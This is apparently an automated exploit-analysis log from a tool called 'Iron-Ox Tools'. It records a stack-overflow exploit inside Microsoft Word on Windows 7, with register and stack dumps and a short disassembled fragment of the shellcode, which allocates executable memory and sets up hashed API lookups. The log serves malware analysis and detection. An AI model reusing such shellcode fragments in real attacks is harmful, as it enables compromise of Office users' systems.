+-------------------------------------------------------------------------+ | This file has been generated by The Iron-Ox Tools | | CopyLeft (c) 2010-2017/VxJump, | | by nEINEI | | Automated Exploit Analysis Tools | +-------------------------------------------------------------------------+ **************************************** 2017/12/26 18:41:23.642 Current Target Process:C:\Program Files\Microsoft Office\Office12\WINWORD.EXE **************************************** OS Version :Windows Win7 Exploit Type:Stack Overflow:4 Address While In The Vulnerability Happens:08889000 Registers While In The Vulnerability Happens: EAX:77700000,EBX:088883EC,ECX:00000000,EDX:778270B4,ESI:77700000,EDI:08888F70,EBP:08888F70,ESP:08888F70 Current Stack Pointer:--->0x08888F70 Stack Information:Probably Execution Code stack[0]:0x1EDE5967 stack[1]:0x00000000 stack[2]:0x8B64C933 stack[3]:0x768B3071 08889000: E8 93FFFFFF CALL 08888F98 ; 08889005: 6A40 PUSH 40 ; 08889007: 68 00300000 PUSH 00003000 ; 0888900C: 68 00005000 PUSH 00500000 ; 08889011: 6A00 PUSH 00 ; 08889013: FF17 CALL DWORD PTR DS:[EDI] ; 08889015: 8BF8 MOV EDI, EAX ; 08889017: 8F4724 POP DWORD PTR DS:[EDI+24H] ; 0888901A: 894710 MOV DWORD PTR DS:[EDI+10H],EAX ; 0888901D: 897714 MOV DWORD PTR DS:[EDI+14H],ESI ; 08889020: C707 8E130AAC MOV DWORD PTR DS:[EDI], AC0A138E ; 08889026: C74704 C2194B01 MOV DWORD PTR DS:[EDI+04H],014B19C2 ; 0888902D: C74708 7DF0A59A MOV DWORD PTR DS:[EDI+08H],9AA5F07D ; 08889034: C7470C 00000000 MOV DWORD PTR DS:[EDI+0CH],00000000 ; 0888903B: 8BEF MOV EBP, EDI ; 0888903D: E8 56FFFFFF CALL 08888F98 ; 08889042: 33F6 XOR ESI, ESI ; 08889044: 83C604 ADD ESI, 04 ; 08889047: 6A00 PUSH 00 ; 08889049: 56 PUSH ESI ;